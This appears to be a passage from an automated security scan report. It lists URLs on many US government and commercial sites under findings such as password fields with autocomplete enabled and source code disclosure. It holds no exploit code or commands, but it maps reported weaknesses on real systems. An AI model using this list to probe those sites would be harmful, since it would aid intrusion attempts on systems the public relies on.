14.221. http://www.va.gov/ext_redirect.asp

14.222. https://www.vermontjoblink.com/ada/

14.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm

14.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

14.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

14.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico

14.227. https://www.vermontjoblink.com/ada/default.cfm

14.228. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

14.229. https://www.vermontjoblink.com/ada/leavesite.cfm

14.230. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

14.231. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

14.232. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm

14.233. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

14.234. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

14.235. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm

14.236. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

14.237. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

14.238. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

14.239. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

14.240. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

14.241. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

14.242. https://www.vermontjoblink.com/ada/works/FAQ.cfm

14.243. https://www.vermontjoblink.com/ada/works/Login.cfm

14.244. https://www.vermontjoblink.com/ada/works/contactus.cfm

14.245. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

14.246. https://www.vermontjoblink.com/ada/works/joboverview.cfm

14.247. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

14.248. https://www.vermontjoblink.com/ada/works/linkview.cfm

14.249. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

14.250. https://www.vermontjoblink.com/favicon.ico

14.251. http://www.visitflorida.com/floridalive

14.252. http://www.vsea.org/

14.253. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp

14.254. http://a.triggit.com/px

14.255. http://ad.yieldmanager.com/pixel

14.256. http://ad.yieldmanager.com/unpixel

14.257. http://ads.adbrite.com/adserver/vdi/711384

14.258. https://adwords.google.com/um/StartNewLogin

14.259. http://amix.dk/

14.260. http://api.twitter.com/1/statuses/user_timeline/okgov.json

14.261. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php

14.262. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS

14.263. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

14.264. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css

14.265. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css

14.266. https://assist.dhss.delaware.gov/favicon.ico

14.267. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg

14.268. https://assist.dhss.delaware.gov/images/Assist_header_text.gif

14.269. https://assist.dhss.delaware.gov/images/Assist_logo.gif

14.270. https://assist.dhss.delaware.gov/images/arrow_center.gif

14.271. https://assist.dhss.delaware.gov/images/arrow_left.gif

14.272. https://assist.dhss.delaware.gov/images/arrow_right.gif

14.273. https://assist.dhss.delaware.gov/images/corner_brown_color.gif

14.274. https://assist.dhss.delaware.gov/images/corner_teal_color.gif

14.275. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif

14.276. https://assist.dhss.delaware.gov/images/shim.gif

14.277. http://b.scorecardresearch.com/b

14.278. http://bh.contextweb.com/bh/rtset

14.279. http://bh.contextweb.com/bh/set.aspx

14.280. http://blogsearch.google.com/

14.281. http://books.google.com/bkshp

14.282. http://books.google.com/books

14.283. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.284. http://co.gov/

14.285. http://del.icio.us/post

14.286. http://delicious.com/post

14.287. http://digg.com/submit

14.288. https://favorites.live.com/quickadd.aspx

14.289. http://finance.yahoo.com/q

14.290. https://fortress.wa.gov/dol/dolprod/vehoffices/

14.291. http://groups.google.com/grphp

14.292. http://i.w55c.net/rs

14.293. http://ia.gov/

14.294. http://ia.gov/weather_conditions/9430739

14.295. http://idaho.gov/public/portal/contact.html

14.296. http://idcs.interclick.com/Segment.aspx

14.297. http://image.providesupport.com/js/hic/safe-standard.js

14.298. http://image.providesupport.com/js/hic/safe-textlink.js

14.299. http://image2.pubmatic.com/AdServer/Pug

14.300. http://in.gov/

14.301. http://in.gov/apps/ii/oss/agencyInfo/listing

14.302. http://in.gov/apps/ii/oss/agencyInfo/selection

14.303. http://in.gov/apps/ii/oss/categoryInfo/listing

14.304. http://in.gov/apps/ii/oss/categoryInfo/selection

14.305. http://in.gov/apps/ii/oss/js/application.js

14.306. http://in.gov/apps/ii/oss/js/filterlist.js

14.307. http://in.gov/apps/ii/oss/mostPopularInfo/selection

14.308. http://in.gov/apps/ii/oss/search/term

14.309. http://in.gov/core/agriculture.html

14.310. http://in.gov/core/business.html

14.311. http://in.gov/core/css/global.css

14.312. http://in.gov/core/css/global2.css

14.313. http://in.gov/core/images/advanced_search-bg.gif

14.314. http://in.gov/core/images/amber_alert.gif

14.315. http://in.gov/core/images/atg.gif

14.316. http://in.gov/core/images/bgs.gif

14.317. http://in.gov/core/images/billboards/INGOV_severe_weather.jpg

14.318. http://in.gov/core/images/billboards/INgov_DNRapp_bb.jpg

14.319. http://in.gov/core/images/billboards/SOS__billboard.jpg

14.320. http://in.gov/core/images/billboards/ingov_inshapebb.jpg

14.321. http://in.gov/core/images/billboards/ingov_tindleybb.jpg

14.322. http://in.gov/core/images/blue_pixel.gif

14.323. http://in.gov/core/images/calendar_icon.gif

14.324. http://in.gov/core/images/elected_officials-icon2.gif

14.325. http://in.gov/core/images/faq_icon-over.gif

14.326. http://in.gov/core/images/faq_icon.gif

14.327. http://in.gov/core/images/footer-wide.gif

14.328. http://in.gov/core/images/footer.gif

14.329. http://in.gov/core/images/go.gif

14.330. http://in.gov/core/images/governor_daniels.gif

14.331. http://in.gov/core/images/highlights_bg_horiz.gif

14.332. http://in.gov/core/images/highlights_bg_vert.gif

14.333. http://in.gov/core/images/highlights_bottom.gif

14.334. http://in.gov/core/images/highlights_left.gif

14.335. http://in.gov/core/images/highlights_right.gif

14.336. http://in.gov/core/images/icon_email.gif

14.337. http://in.gov/core/images/icon_findperson.gif

14.338. http://in.gov/core/images/icon_help.gif

14.339. http://in.gov/core/images/icon_link.gif

14.340. http://in.gov/core/images/icon_mobile.gif

14.341. http://in.gov/core/images/icon_ratepage.gif

14.342. http://in.gov/core/images/icon_rss.gif

14.343. http://in.gov/core/images/icon_subscribe.gif

14.344. http://in.gov/core/images/icon_twitter.gif

14.345. http://in.gov/core/images/icon_youtube.gif

14.346. http://in.gov/core/images/indiana_map.gif

14.347. http://in.gov/core/images/ingov_logo.gif

14.348. http://in.gov/core/images/lgov.gif

14.349. http://in.gov/core/images/link_divider.gif

14.350. http://in.gov/core/images/main_bg-wide.gif

14.351. http://in.gov/core/images/main_bg.gif

14.352. http://in.gov/core/images/next.gif

14.353. http://in.gov/core/images/next.png

14.354. http://in.gov/core/images/online_services_icon-over.gif

14.355. http://in.gov/core/images/online_services_icon.gif

14.356. http://in.gov/core/images/page_bg.jpg

14.357. http://in.gov/core/images/prev.gif

14.358. http://in.gov/core/images/prev.png

14.359. http://in.gov/core/images/search_button-new2.gif

14.360. http://in.gov/core/images/search_button.gif

14.361. http://in.gov/core/images/searchfield_bg-new2.gif

14.362. http://in.gov/core/images/sos.gif

14.363. http://in.gov/core/images/subscribe_button.gif

14.364. http://in.gov/core/images/tab_bg.gif

14.365. http://in.gov/core/images/tab_left.gif

14.366. http://in.gov/core/images/tab_right.gif

14.367. http://in.gov/core/images/topnav_bg.jpg

14.368. http://in.gov/core/images/topnav_left.jpg

14.369. http://in.gov/core/images/topnav_right.jpg

14.370. http://in.gov/core/index_pages/quicklinks.html

14.371. http://in.gov/core/index_pages/void()

14.372. http://in.gov/core/js/_arss.js

14.373. http://in.gov/core/js/agency.js

14.374. http://in.gov/core/js/arss.css

14.375. http://in.gov/core/js/arss.js

14.376. http://in.gov/core/js/faq.js

14.377. http://in.gov/core/js/jquery-1.4.2.min.js

14.378. http://in.gov/core/js/jquery.jfontsizer.js

14.379. http://in.gov/core/js/jquery.metadata.min.js

14.380. http://in.gov/core/js/jquery.slideshow.js

14.381. http://in.gov/core/js/jquery.swapimage.min.js

14.382. http://in.gov/core/js/menu.js

14.383. http://in.gov/core/js/portal_scripts.js

14.384. http://in.gov/core/js/prototype-1.6.1.js

14.385. http://in.gov/core/online_services.html

14.386. http://in.gov/favicon.ico

14.387. http://in.gov/gov/photo.htm

14.388. http://in.gov/sos/securities/2521.htm

14.389. http://in.gov/spd/2333.htm

14.390. http://in.gov/void()

14.391. http://io9.com/assets/base.v9/js/selcontsimple.js

14.392. https://iris.custhelp.com/

14.393. https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D

14.394. https://iris.custhelp.com/app/home

14.395. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css

14.396. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css

14.397. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css

14.398. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css

14.399. https://iris.custhelp.com/euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css

14.400. https://iris.custhelp.com/rnt/rnw/css/enduser.css

14.401. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif

14.402. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js

14.403. https://iris.va.gov/favicon.ico

14.404. http://kdkgllry.netmng.com/

14.405. http://khmdb0.google.com/kh

14.406. http://khmdb1.google.com/kh

14.407. http://ksgovernment.feedbacksurvey.sgizmo.com/

14.408. https://maps-api-ssl.google.com/maps

14.409. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777

14.410. http://nc.gov/

14.411. http://newbrowse.livehelper.com/servlet/lhBrowse

14.412. http://nv.gov/

14.413. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

14.414. http://pipes.yahoo.com/pipes/pipe.run

14.415. https://pixel.fetchback.com/serve/fb/pdc

14.416. http://pixel.mathtag.com/event/img

14.417. http://pixel.quantserve.com/pixel

14.418. http://pixel.rubiconproject.com/tap.php

14.419. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

14.420. http://sc.gov/

14.421. http://scholar.google.com/schhp

14.422. http://sd.gov/

14.423. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

14.424. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

14.425. http://server.iad.liveperson.net/hc/33511087/

14.426. http://server.iad.liveperson.net/hc/33511087/

14.427. http://server.iad.liveperson.net/hc/33511087/x.js

14.428. http://shots.snap.com/snap_shots.js

14.429. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127

14.430. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197

14.431. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136

14.432. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296

14.433. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344

14.434. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755

14.435. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695

14.436. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695

14.437. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832

14.438. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

14.439. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

14.440. http://statse.webtrendslive.com/dcsvtpx6221e5hyrdsxs9yl5f_6q9i/njs.gif

14.441. http://translate.googleapis.com/translate_a/l

14.442. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe

14.443. http://twitter.com/statuses/user_timeline/IDAHOgov.json

14.444. http://va.gov/

14.445. http://video.google.com/

14.446. http://visitor.constantcontact.com/d.jsp

14.447. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

14.448. http://webmail.aol.com/

14.449. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

14.450. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

14.451. https://www.accesskansas.org/images/footer_images/current_year.gif

14.452. https://www.accesskansas.org/images/footer_images/from2002.gif

14.453. https://www.accesskansas.org/kbc/img/icons/external.png

14.454. http://www.act.org/certificate/employers.html

14.455. https://www.alabamainteractive.org/favicon.ico

14.456. http://www.amberalert.com/en/alerts/state/

14.457. http://www.atg.wa.gov/BlogPost.aspx

14.458. https://www.bbb.org/online/consumer/cks.aspx

14.459. http://www.blogs.va.gov/VAntage/

14.460. http://www.colorado.gov/cms/coloradogov/images/bgrd_bulletBlue.gif

14.461. http://www.colorado.gov/cms/coloradogov/images/bgrd_callBoxGray.gif

14.462. http://www.colorado.gov/cms/coloradogov/images/bgrd_cbe3.gif

14.463. http://www.colorado.gov/cms/coloradogov/images/bgrd_lottoBack2.gif

14.464. http://www.colorado.gov/cms/coloradogov/images/bgrd_stateLegTabSeal.png

14.465. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel-dash.gif

14.466. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel2.gif

14.467. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel4.gif

14.468. http://www.colorado.gov/cms/coloradogov/images/img_cash5Short.gif

14.469. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow.gif

14.470. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow_disable.gif

14.471. http://www.colorado.gov/cms/coloradogov/images/img_lottoBall.png

14.472. http://www.colorado.gov/cms/coloradogov/images/img_lottoBallGreen.png

14.473. http://www.colorado.gov/cms/coloradogov/images/img_lottoShort.gif

14.474. http://www.colorado.gov/cms/coloradogov/images/img_matchplayShort.gif

14.475. http://www.colorado.gov/cms/coloradogov/images/img_megamillionsShort.gif

14.476. http://www.colorado.gov/cms/coloradogov/images/img_powerballShort.gif

14.477. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow.gif

14.478. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow_disable.gif

14.479. http://www.colorado.gov/cms/coloradogov/images/tab_CBE2-blu.gif

14.480. http://www.colorado.gov/cms/coloradogov/images/tab_agHiLt-clr.gif

14.481. http://www.colorado.gov/cms/coloradogov/images/tab_alerts-red.gif

14.482. http://www.colorado.gov/cms/coloradogov/images/tab_govInt-govTrns-blu.gif

14.483. http://www.colorado.gov/cms/coloradogov/images/tab_howdoi-blu.gif

14.484. http://www.colorado.gov/cms/coloradogov/images/tab_infofor-blu.gif

14.485. http://www.colorado.gov/cms/coloradogov/images/tab_services-blu.gif

14.486. http://www.colorado.gov/cms/coloradogov/images/tab_services-clr.gif

14.487. http://www.colorado.gov/cms/coloradogov/images/tab_stateLeg-blu.gif

14.488. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-blu.gif

14.489. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-clr.gif

14.490. http://www.colorado.gov/cms/coloradogov/images/tab_traffic-blu.gif

14.491. http://www.colorado.gov/cms/coloradogov/images/tab_weather-blu.gif

14.492. http://www.colorado.gov/cms/coloradogov/images/tab_weather-clr.gif

14.493. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf

14.494. https://www.colorado.gov/apps/feedback/servlet/begin

14.495. http://www.conwaygreene.com/nmsu/lpext.dll

14.496. http://www.ct.gov/ctportal/cwp/view.asp

14.497. http://www.ct.gov/ctportal/site/default.asp

14.498. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp

14.499. http://www.ct.gov/dcp/cwp/view.asp

14.500. http://www.ct.gov/dep/cwp/view.asp

14.501. http://www.ct.gov/dmv/cwp/view.asp

14.502. http://www.ct.gov/drs/cwp/view.asp

14.503. http://www.ct.gov/opm/cwp/view.asp

14.504. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace

14.505. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers

14.506. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

14.507. http://www.dms.myflorida.com/index.php/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

14.508. http://www.elearningnc.gov/

14.509. http://www.facebook.com/TeamHaslam

14.510. http://www.facebook.com/WSDOL

14.511. http://www.facebook.com/note.php

14.512. http://www.facebook.com/ohiodivisionofwatercraft

14.513. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845

14.514. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

14.515. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

14.516. http://www.facebook.com/photo.php

14.517. http://www.facebook.com/share.php

14.518. http://www.facebook.com/video/video.php

14.519. http://www.flickr.com/groups_join.gne

14.520. http://www.governor.ct.gov/malloy/cwp/view.asp

14.521. http://www.governor.ny.gov/

14.522. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

14.523. http://www.ieaddons.com/en/ie8slice/wsUpdate.aspx

14.524. http://www.illinoisfilm.biz/index.php

14.525. http://www.in.gov/ai/appfiles/cms/alert.css

14.526. http://www.in.gov/ai/appfiles/oss/oss_logos/bmv_oss.jpg

14.527. http://www.in.gov/ai/errors/dwd_404.html

14.528. http://www.in.gov/ai/js-webtrends/webtrends.js

14.529. http://www.in.gov/ai/js-webtrends/wtbase.js

14.530. http://www.in.gov/apps/options/email.aspx

14.531. http://www.in.gov/apps/options/rate.aspx

14.532. http://www.in.gov/apps/options/suggestion.aspx

14.533. http://www.in.gov/core/faqs.html

14.534. http://www.in.gov/dhs/3163.htm

14.535. http://www.in.gov/dnr/6406.htm

14.536. http://www.in.gov/dwd/2216.css

14.537. http://www.in.gov/dwd/2217.js

14.538. http://www.in.gov/dwd/WorkOne//

14.539. http://www.in.gov/dwd/WorkOne//favicon.ico

14.540. http://www.in.gov/dwd/WorkOne//images/body_bg.gif

14.541. http://www.in.gov/dwd/WorkOne//images/index_footer.jpg

14.542. http://www.in.gov/dwd/WorkOne//images/index_people.png

14.543. http://www.in.gov/dwd/WorkOne//images/wrapper_bg.gif

14.544. http://www.in.gov/dwd/WorkOne//scripts/gfeedfetcher.js

14.545. http://www.in.gov/dwd/WorkOne//styles/index_layout.css

14.546. http://www.in.gov/dwd/WorkOne//styles/index_styles.css

14.547. http://www.in.gov/dwd/WorkOne//styles/layout.css

14.548. http://www.in.gov/dwd/WorkOne//styles/reset.css

14.549. http://www.in.gov/dwd/WorkOne//styles/styles.css

14.550. http://www.in.gov/dwd/WorkOne/images/index_arrow.png

14.551. http://www.in.gov/dwd/WorkOne/images/index_title.png

14.552. http://www.in.gov/dwd/WorkOne/scripts//dwd/WorkOne/scripts/indicator.gif

14.553. http://www.in.gov/dwd/images/GovDev_Left_Logo.jpg

14.554. http://www.in.gov/dwd/images/amber_void.jpg

14.555. http://www.in.gov/dwd/images/col2_top_bg.jpg

14.556. http://www.in.gov/dwd/images/col3_top_bg.gif

14.557. http://www.in.gov/dwd/images/faq_bg.jpg

14.558. http://www.in.gov/dwd/images/link_header_bg.jpg

14.559. http://www.in.gov/dwd/images/navMore.gif

14.560. http://www.in.gov/dwd/images/subscribe_dwd.jpg

14.561. http://www.in.gov/dwd/images/uplink_btn_rdax_100_rdax_100.jpg

14.562. http://www.in.gov/dwd/images/want_bg.jpg

14.563. http://www.in.gov/dwd/images/widget2_rdax_100_rdax_100.jpg

14.564. http://www.in.gov/idem/hoosierscare/5601.htm

14.565. http://www.in.gov/iedc/

14.566. http://www.in.gov/isda/2435.htm

14.567. http://www.in.gov/oed/2367.htm

14.568. http://www.in.gov/oed/2572.htm

14.569. http://www.in.gov/pla/license.htm

14.570. http://www.in.gov/portal/global/css/5.css

14.571. http://www.in.gov/portal/global/css/7.css

14.572. http://www.in.gov/portal/global/images/about_bg.jpg

14.573. http://www.in.gov/portal/global/images/bullet_white.gif

14.574. http://www.in.gov/portal/global/images/header.jpg

14.575. http://www.in.gov/portal/global/images/horz_nav.jpg

14.576. http://www.in.gov/portal/global/images/horz_nav2_bg.jpg

14.577. http://www.in.gov/portal/global/images/mobile-icon-hover4.gif

14.578. http://www.in.gov/portal/global/images/nav_bg.jpg

14.579. http://www.in.gov/portal/global/images/rss-logo.jpg

14.580. http://www.in.gov/portal/global/images/search_bg.jpg

14.581. http://www.in.gov/portal/global/images/tour_bg.jpg

14.582. http://www.in.gov/portal/global/javascript/9.js

14.583. http://www.in.gov/portal/images/amberalert.jpg

14.584. http://www.in.gov/portal/images/amberalerttest.jpg

14.585. http://www.in.gov/portal/images/govdev_icon0.gif

14.586. http://www.in.gov/portal/images/horz_nav2_bg_solid.jpg

14.587. http://www.in.gov/portal/images/link.gif

14.588. http://www.in.gov/portal/images/linkhover.gif

14.589. http://www.in.gov/portal/images/mail.gif

14.590. http://www.in.gov/portal/images/mobile-icon.gif

14.591. http://www.in.gov/portal/images/print.gif

14.592. http://www.in.gov/portal/images/rate.gif

14.593. http://www.in.gov/portal/images/rss_logo.gif

14.594. http://www.in.gov/portal/images/search_button.jpg

14.595. http://www.in.gov/recycle/5636.htm

14.596. http://www.indianacareerconnect.com/

14.597. https://www.mcafeesecure.com/RatingVerify

14.598. http://www.mdod.maryland.gov/WorkArea/linkit.aspx

14.599. http://www.michie.com/tennessee/lpext.dll

14.600. http://www.michigan.org/Partners/Default.aspx

14.601. http://www.ncesc.com/lmi/default.asp

14.602. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css

14.603. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css

14.604. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css

14.605. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

14.606. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif

14.607. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

14.608. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

14.609. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

14.610. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif

14.611. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif

14.612. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif

14.613. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif

14.614. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js

14.615. https://www.nrsservicecenter.com/favicon.ico

14.616. http://www.nv.gov/NV_default4.aspx

14.617. http://www.nv.gov/WorkArea/DmsMenu/DmsMenu.js

14.618. http://www.nv.gov/WorkArea/java/ektron.js

14.619. http://www.nv.gov/WorkArea/java/thickbox.js

14.620. http://www.nv.gov/workarea/java/ektronJs.ashx

14.621. https://www.ri.gov/Licensing/renewal/license.php

14.622. http://www.sc.gov/PublishingImages/favicon.ico

14.623. https://www.scsignon.sc.gov/

14.624. https://www.scsignon.sc.gov/Common/HelpWindow.aspx

14.625. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx

14.626. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx

14.627. https://www.scsignon.sc.gov/Login.aspx

14.628. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx

14.629. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx

14.630. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx

14.631. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx

14.632. https://www.scsignon.sc.gov/WebResource.axd

14.633. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx

14.634. http://www.state.co.us/gov_dir/leg_dir/gaweb/scroom353.asx

14.635. http://www.state.mn.us/portal/mn/jsp/content.do

14.636. http://www.state.mn.us/portal/mn/jsp/contentprocess.do

14.637. http://www.state.mn.us/portal/mn/jsp/home.do

14.638. http://www.state.mn.us/portal/mn/jsp/hybrid.do

14.639. http://www.state.mn.us/portal/mn/jsp/logon.do

14.640. http://www.state.mn.us/portal/mn/jsp/redirectLink.do

14.641. http://www.state.mn.us/portal/mn/jsp/search.do

14.642. http://www.state.sd.us/calendar/index.cfm

14.643. http://www.surveymonkey.com/jsPop.aspx

14.644. http://www.va.gov/directory/guide/division_flsh.asp

14.645. http://www.va.gov/iris/home.html

14.646. http://www.va.gov/landing2_contact.htm

14.647. http://www.va.gov/opa/pressrel/pressrelease.cfm

14.648. http://www.visitflorida.com/includes/js/footerSurvey.php

14.649. http://www.vitalchek.com/Campaign

14.650. http://www.vitalchek.com/Campaign/

14.651. http://www.vitalchek.com/Telerik.Web.UI.WebResource.axd

14.652. http://www.vitalchek.com/WebResource.axd

14.653. http://www.vitalchek.com/css/Portal/VitalChek/main.aspx

14.654. http://www.vitalchek.com/default.aspx

14.655. http://www.vitalchek.com/images/background/bg_chat.png

14.656. http://www.vitalchek.com/js/google_analytics_js.aspx

14.657. http://www.wor710.com/topic/play_window.php

14.658. http://www.wycokck.org/dept.aspx

15. Password field with autocomplete enabled

15.1. https://apps.tn.gov/biztax-app/login.html

15.2. https://bugzilla.mozilla.org/show_bug.cgi

15.3. https://bugzilla.mozilla.org/show_bug.cgi

15.4. http://digg.com/submit

15.5. https://dotax.ehawaii.gov/efile/user

15.6. https://mibid.bidcorp.com/Login.aspx

15.7. https://mibid.bidcorp.com/login.aspx

15.8. https://myalaska.state.ak.us/home/app

15.9. https://myalaska.state.ak.us/login/login.aspx

15.10. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php

15.11. https://nhlicenses.nh.gov/MyLicense%20Enterprise/

15.12. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

15.13. https://onestop.michigan.gov/OneStop/a

15.14. https://onestop.michigan.gov/css/none

15.15. https://onestop.michigan.gov/images/imgBanBG.gif

15.16. https://onestop.michigan.gov/onestop-main/OneStop/a

15.17. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do

15.18. http://pa.gov/portal/server.pt

15.19. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

15.20. http://www.alabama.gov/portal/index.jsp

15.21. https://www.compasssmartshopper.com/default.aspx

15.22. https://www.ehawaii.gov/efile/

15.23. http://www.facebook.com/TeamHaslam

15.24. http://www.facebook.com/WSDOL

15.25. http://www.facebook.com/note.php

15.26. http://www.facebook.com/ohiodivisionofwatercraft

15.27. http://www.facebook.com/photo.php

15.28. http://www.facebook.com/share.php

15.29. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

15.30. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc

15.31. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc

15.32. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

15.33. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

15.34. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

15.35. https://www.nrsservicecenter.com/iApp/ret/landing.do

15.36. https://www.nrsservicecenter.com/iApp/ret/showPage.do

15.37. https://www.scsignon.sc.gov/

15.38. https://www.scsignon.sc.gov/

15.39. https://www.scsignon.sc.gov/Login.aspx

15.40. https://www.vermontjoblink.com/ada/

15.41. https://www.vermontjoblink.com/ada/default.cfm

15.42. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

15.43. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

15.44. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

15.45. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

15.46. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

15.47. https://www.vermontjoblink.com/ada/works/Login.cfm

15.48. https://www.vermontjoblink.com/ada/works/Login.cfm

15.49. http://www.visitflorida.com/floridalive

15.50. http://www.vsea.org/

15.51. http://www.vsea.org/editorial-lays-out-vermont%26%23039

15.52. http://www.vsea.org/favicon.ico

15.53. http://www.vsea.org/join-vsea

15.54. http://www.vsea.org/join-your-union

15.55. http://www.vsea.org/maine-study-finds-state%26%23039

15.56. http://www.vsea.org/node

15.57. http://www.vsea.org/purchase-vsea-clothing

15.58. http://www.vsea.org/state-hospital%26%23039

16. Source code disclosure

16.1. http://data.ok.gov/packages/base.js

16.2. http://data.ok.gov/packages/shared-map.js

16.3. http://data.ok.gov/packages/shared-table-editor.js

16.4. https://onestop.michigan.gov/onestop-main/OneStop/js/actionSubmit.js

16.5. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js

16.6. http://www.dot.state.tx.us/txdoteforms/GetForm

